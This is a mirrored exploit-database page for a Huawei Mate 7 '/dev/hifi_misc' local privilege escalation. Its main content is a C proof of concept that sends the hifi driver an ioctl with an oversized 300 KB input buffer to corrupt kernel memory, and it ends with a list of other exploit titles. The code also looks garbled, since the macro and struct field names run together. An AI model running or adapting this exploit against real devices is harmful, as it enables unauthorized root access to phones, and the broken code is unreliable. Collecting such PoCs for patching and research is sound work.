Huawei Mate 7 – ‘/dev/hifi_misc’ Privilege Escalation

Exploit Database
15 阅读

作者： pray3r

日期： 2016-01-24
类别：
- local
平台：
- hardware
来源：https://www.exploit-db.com/exploits/44306/

/*
 *
 *HuaWei Mate7 hifi driver Poc
 *
 *Writen by pray3r, <pray3r.z@gmail.com>
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/ioctl.h>

#define HIFI_MISC_IOCTL_WRITE_PARAMS_IOWR('A', 0x75, struct misc_io_sync_param)

struct misc_io_sync_param {
	void *para_in; 
	unsigned intpara_size_in; 
	void *para_out; 
	unsigned intpara_size_out; 
};

int main(int arg, char **argv)
{
	int fd; 
	void *in = malloc(300 * 1024);
	void *out = malloc(100);
	struct misc_io_sync_param poc;

	poc.para_in = in;
	poc.para_size_in = 300 * 1024;
	poc.para_out = out;
	poc.para_size_out = 100;

	fd = open("/dev/hifi_misc", O_RDWR);

	ioctl(fd, HIFI_MISC_IOCTL_WRITE_PARAMS, &poc);

	free(in);
	free(out);

	return 0;
}

last Exploits
Huawei Mate 7 – ‘/dev/hifi_misc’ Privilege Escalation的更多信息

Plantronics Hub 3.13.2 – SpokesUpdateService Privilege Escalation (Metasploit)：
Odoo 12.0.20190101 – ‘nssm.exe’ Unquoted Service Path：
T-Mobile Internet Manager – Local Buffer Overflow (SEH)：
Metasploit Framework 6.0.11 – msfvenom APK template command injection：
ESTsoft ALYac Anti-Virus 1.5 < 5.0.1.2 - Local Privilege Escalation：
Nord VPN-6.31.13.0 – ‘nordvpn-service’ Unquoted Service Path：
NetBSD – ‘mail.local(8)’ Local Privilege Escalation (Metasploit)：
Symantec Encryption Desktop 10 – Local Buffer Overflow / Local Privilege Escalation：